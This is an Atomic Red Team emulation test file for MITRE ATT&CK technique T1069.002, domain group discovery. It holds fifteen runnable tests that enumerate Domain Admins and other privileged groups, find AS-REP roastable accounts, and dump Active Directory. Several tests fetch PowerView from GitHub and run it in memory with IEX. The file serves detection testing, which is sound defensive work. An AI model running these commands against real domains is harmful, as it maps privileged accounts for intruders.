atomics/T1069.002/T1069.002.md

# T1069.002 - Permission Groups Discovery: Domain Groups
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1069/002)
<blockquote>

Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

Commands such as <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility,  <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain-level groups.

</blockquote>

## Atomic Tests

- [Atomic Test #1 - Basic Permission Groups Discovery Windows (Domain)](#atomic-test-1---basic-permission-groups-discovery-windows-domain)

- [Atomic Test #2 - Permission Groups Discovery PowerShell (Domain)](#atomic-test-2---permission-groups-discovery-powershell-domain)

- [Atomic Test #3 - Elevated group enumeration using net group (Domain)](#atomic-test-3---elevated-group-enumeration-using-net-group-domain)

- [Atomic Test #4 - Find machines where user has local admin access (PowerView)](#atomic-test-4---find-machines-where-user-has-local-admin-access-powerview)

- [Atomic Test #5 - Find local admins on all machines in domain (PowerView)](#atomic-test-5---find-local-admins-on-all-machines-in-domain-powerview)

- [Atomic Test #6 - Find Local Admins via Group Policy (PowerView)](#atomic-test-6---find-local-admins-via-group-policy-powerview)

- [Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast)](#atomic-test-7---enumerate-users-not-requiring-pre-auth-asreproast)

- [Atomic Test #8 - Adfind - Query Active Directory Groups](#atomic-test-8---adfind---query-active-directory-groups)

- [Atomic Test #9 - Enumerate Active Directory Groups with Get-AdGroup](#atomic-test-9---enumerate-active-directory-groups-with-get-adgroup)

- [Atomic Test #10 - Enumerate Active Directory Groups with ADSISearcher](#atomic-test-10---enumerate-active-directory-groups-with-adsisearcher)

- [Atomic Test #11 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)](#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting)

- [Atomic Test #12 - Get-DomainGroupMember with PowerView](#atomic-test-12---get-domaingroupmember-with-powerview)

- [Atomic Test #13 - Get-DomainGroup with PowerView](#atomic-test-13---get-domaingroup-with-powerview)

- [Atomic Test #14 - Active Directory Enumeration with LDIFDE](#atomic-test-14---active-directory-enumeration-with-ldifde)

- [Atomic Test #15 - Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS](#atomic-test-15---active-directory-domain-search-using-ldap---linux-ubuntumacos)


<br/>

## Atomic Test #1 - Basic Permission Groups Discovery Windows (Domain)
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
information will be displayed.

**Supported Platforms:** Windows


**auto_generated_guid:** dd66d77d-8998-48c0-8024-df263dc2ce5d


#### Attack Commands: Run with `command_prompt`! 


```cmd
net localgroup
net group /domain
net group "enterprise admins" /domain
net group "domain admins" /domain
```


<br/>
<br/>

## Atomic Test #2 - Permission Groups Discovery PowerShell (Domain)
Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
information will be displayed.

**Supported Platforms:** Windows


**auto_generated_guid:** 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7


#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user | User to identify what groups a user is a member of | string | $env:USERNAME|


#### Attack Commands: Run with `powershell`! 


```powershell
get-ADPrincipalGroupMembership #{user} | select name
```


<br/>
<br/>

## Atomic Test #3 - Elevated group enumeration using net group (Domain)
Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This
test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.

**Supported Platforms:** Windows


**auto_generated_guid:** 0afb5163-8181-432e-9405-4322710c0c37


#### Attack Commands: Run with `command_prompt`! 


```cmd
net groups "Account Operators" /domain
net groups "Exchange Organization Management" /domain
net group "BUILTIN\Backup Operators" /domain
net group "Domain Admins" /domain
```


<br/>
<br/>

## Atomic Test #4 - Find machines where user has local admin access (PowerView)
Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.

**Supported Platforms:** Windows


**auto_generated_guid:** a2d71eee-a353-4232-9f86-54f4288dd8c1


#### Attack Commands: Run with `powershell`! 


```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose
```


<br/>
<br/>

## Atomic Test #5 - Find local admins on all machines in domain (PowerView)
Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed.

**Supported Platforms:** Windows


**auto_generated_guid:** a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd


#### Attack Commands: Run with `powershell`! 


```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin  -Verbose
```


<br/>
<br/>

## Atomic Test #6 - Find Local Admins via Group Policy (PowerView)
takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed.

**Supported Platforms:** Windows


**auto_generated_guid:** 64fdb43b-5259-467a-b000-1b02c00e510a


#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | hostname of the computer to analyze | path | $env:COMPUTERNAME|


#### Attack Commands: Run with `powershell`! 


```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose
```


<br/>
<br/>

## Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast)
When successful, accounts that do not require kerberos pre-auth will be returned

**Supported Platforms:** Windows


**auto_generated_guid:** 870ba71e-6858-4f6d-895c-bb6237f6121b


#### Attack Commands: Run with `powershell`! 


```powershell
get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}
```


#### Dependencies:  Run with `powershell`!
##### Description: Computer must be domain joined.
##### Check Prereq Commands:
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Write-Host Joining this computer to a domain must be done manually.
```
##### Description: Requires the Active Directory module for powershell to be installed.
##### Check Prereq Commands:
```powershell
if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
```


<br/>
<br/>

## Atomic Test #8 - Adfind - Query Active Directory Groups
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

**Supported Platforms:** Windows


**auto_generated_guid:** 48ddc687-82af-40b7-8472-ff1e742e8274


#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |


#### Attack Commands: Run with `command_prompt`! 


```cmd
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=group) #{optional_args}
```


#### Dependencies:  Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
```


<br/>
<br/>

## Atomic Test #9 - Enumerate Active Directory Groups with Get-AdGroup
The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory.
Upon successful execution a listing of groups will output with their paths in AD.
Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps

**Supported Platforms:** Windows


**auto_generated_guid:** 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8


#### Attack Commands: Run with `powershell`! 


```powershell
Get-AdGroup -Filter *
```


<br/>
<br/>

## Atomic Test #10 - Enumerate Active Directory Groups with ADSISearcher
The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
Upon successful execution a listing of groups will output with their paths in AD.
Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/

**Supported Platforms:** Windows


**auto_generated_guid:** 9f4e344b-8434-41b3-85b1-d38f29d148d0


#### Attack Commands: Run with `powershell`! 


```powershell
([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
```


<br/>
<br/>

## Atomic Test #11 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
When successful, accounts that do not require kerberos pre-auth will be returned.
Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html

**Supported Platforms:** Windows


**auto_generated_guid:** 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8


#### Attack Commands: Run with `powershell`! 


```powershell
Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
```


#### Dependencies:  Run with `powershell`!
##### Description: Computer must be domain joined.
##### Check Prereq Commands:
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Write-Host Joining this computer to a domain must be done manually.
```
##### Description: Requires the Active Directory module for powershell to be installed.
##### Check Prereq Commands:
```powershell
if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
```


<br/>
<br/>

## Atomic Test #12 - Get-DomainGroupMember with PowerView
Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed.

**Supported Platforms:** Windows


**auto_generated_guid:** 46352f40-f283-4fe5-b56d-d9a71750e145


#### Attack Commands: Run with `powershell`! 


```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
```


<br/>
<br/>

## Atomic Test #13 - Get-DomainGroup with PowerView
Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed.

**Supported Platforms:** Windows


**auto_generated_guid:** 5a8a181c-2c8e-478d-a943-549305a01230


#### Attack Commands: Run with `powershell`! 


```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
```


<br/>
<br/>

## Atomic Test #14 - Active Directory Enumeration with LDIFDE
Output information from Active Directory to a specified file. [Ldifde](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc731033(v=ws.11)) is a CLI tool for creating, modifying and deleting directory objects.
The test is derived from the CISA Report on Voly Typhoon. Reference: https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF

**Supported Platforms:** Windows


**auto_generated_guid:** 22cf8cb9-adb1-4e8c-80ca-7c723dfc8784


#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_path | Path to the file that ldifde will output | path | C:&#92;Windows&#92;temp|
| output_file | The filename to be created by ldifde | string | atomic_ldifde.txt|


#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 


```cmd
ldifde.exe -f #{output_path}\#{output_file} -p subtree
```

#### Cleanup Commands:
```cmd
del #{output_path}\#{output_file}
```


#### Dependencies:  Run with `powershell`!
##### Description: PowerShell ActiveDirectory Module must be installed
##### Check Prereq Commands:
```powershell
Try {
    Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
    exit 0
}
Catch {
    exit 1
}
```
##### Get Prereq Commands:
```powershell
if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
  Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
} else {
  Install-WindowsFeature RSAT-AD-PowerShell
}
```


<br/>
<br/>

## Atomic Test #15 - Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS
Output information from LDAPSearch. LDAP Password is the admin-user password on Active Directory

**Supported Platforms:** Linux


**auto_generated_guid:** d58d749c-4450-4975-a9e9-8b1d562755c2


#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | The domain to be tested | string | example|
| top_level_domain | The top level domain (.com, .test, .remote, etc... following domain, minus the .) | string | com|
| user | username@domain of a user | string | user@example.com|
| password | password of the user referenced inside user | string | s3CurePssw0rD!|


#### Attack Commands: Run with `sh`! 


```sh
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" "(objectClass=group)" -s sub -a always -z 1000 dn
```


#### Dependencies:  Run with `sh`!
##### Description: Packages sssd-ad sssd-tools realmd adcli installed and realm available, ldapsearch
##### Check Prereq Commands:
```sh
which ldapsearch
```
##### Get Prereq Commands:
```sh
echo missing ldapsearch command; exit 1
```


<br/>